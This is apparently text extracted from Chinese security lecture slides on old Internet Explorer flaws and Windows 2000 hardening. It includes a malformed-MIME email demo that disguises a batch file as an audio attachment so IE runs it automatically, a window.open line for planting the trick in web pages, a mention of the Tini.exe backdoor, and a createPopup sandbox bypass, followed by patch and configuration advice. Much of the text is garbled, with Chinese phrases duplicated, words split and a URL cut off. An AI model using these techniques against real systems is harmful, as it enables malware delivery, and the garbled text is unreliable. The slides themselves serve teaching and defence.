43、Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable 帶有MIME格 式的附件 正文部分 I will execute some console commands -2- -1 Content-Type: audio/x-wav; name=hello.bat Content-Transfer-Encoding: quoted-printable Content-ID: echo OFF dir C: echo YOUR SYSTEM HAS A VULNERABILITY pause -

44、1 附件部分 這里調(diào)用 hello.bat 文件類型故意設(shè)置 成Audio，IE將直 接執(zhí)行之 正常情況下，系統(tǒng)會(huì)彈出一個(gè)提 示窗口，而在漏洞利用的情況下，系 統(tǒng)不會(huì)提示，而是自動(dòng)執(zhí)行程序或命 令。 攻擊思路攻擊思路 攻擊者可以編寫錯(cuò)誤攻擊者可以編寫錯(cuò)誤MIME頭的郵件，在頭的郵件，在 附件中加入可執(zhí)行的程序（病毒、蠕蟲、附件中加入可執(zhí)行的程序（病毒、蠕蟲、 后門、木馬等）后門、木馬等） Happy Time；Nimda； 小榕的小榕的OutlookAttack程序；程序； 在網(wǎng)頁(yè)中加入惡意代碼，使瀏覽者中招；在網(wǎng)頁(yè)中加入惡意代碼，使瀏覽者中招； window.ope n(readme.eml

45、,null,resizable=no,top=6000,left=6 000) http:/ Tini.exe 解決方案解決方案 將將IE升級(jí)到最新版本升級(jí)到最新版本6.0；或打補(bǔ)丁；或打補(bǔ)丁IE5.01 、IE5.5要打要打 SP1；SP2； 對(duì)于有疑問(wèn)的頁(yè)面，使用一些文本編輯工對(duì)于有疑問(wèn)的頁(yè)面，使用一些文本編輯工 具打開(kāi)查看代碼。具打開(kāi)查看代碼。 使用實(shí)時(shí)殺毒軟件；使用實(shí)時(shí)殺毒軟件； 升級(jí)微軟的升級(jí)微軟的Media Player至至7.1 最新安全問(wèn)題最新安全問(wèn)題 原因是原因是 IE5.5 的的javascript 的的window對(duì)象多對(duì)象多 了一個(gè)屬性了一個(gè)屬性 createPopup

46、。打開(kāi)新的窗口，打開(kāi)新的窗口， 作為作為 本地網(wǎng)頁(yè)運(yùn)行，從而繞過(guò)安全限制。本地網(wǎng)頁(yè)運(yùn)行，從而繞過(guò)安全限制。 http:/www.liquidwd.freeserve.co.uk/ 在在CMD.exe窗口，窗口，CD到操作系統(tǒng)目錄下的到操作系統(tǒng)目錄下的 downloaded program files執(zhí)行執(zhí)行cacls . /e /d administrators Win2K 安全建議安全建議 Set up 1分區(qū)和邏輯盤的分配分區(qū)和邏輯盤的分配 推薦的安全配置是建立三個(gè)邏輯驅(qū)動(dòng)器，第一個(gè)大于推薦的安全配置是建立三個(gè)邏輯驅(qū)動(dòng)器，第一個(gè)大于2G ，用來(lái)裝系統(tǒng)和重要的日志文件，第二個(gè)放用來(lái)裝系統(tǒng)和重要的日志文件，第二個(gè)放IIS，第三個(gè)第三個(gè) 放放FTP，這樣無(wú)論這樣無(wú)論IIS或或FTP出了安全漏洞都不會(huì)直接影出了安全漏洞都不會(huì)直接影 響到系統(tǒng)目錄和系統(tǒng)文件。響到系統(tǒng)目錄和系統(tǒng)文件。 2安裝順序的選擇：安裝順序的選擇： 首先，何時(shí)接入網(wǎng)絡(luò)：首先，何時(shí)接入網(wǎng)絡(luò)： 補(bǔ)丁的安裝：補(bǔ)丁的安裝應(yīng)該在所有應(yīng)用程序安裝完之補(bǔ)丁的安裝：補(bǔ)丁的安裝應(yīng)該在所有應(yīng)用程序安裝完之 后后 Configing 端口：端口： IIS： 在在IIS管理器中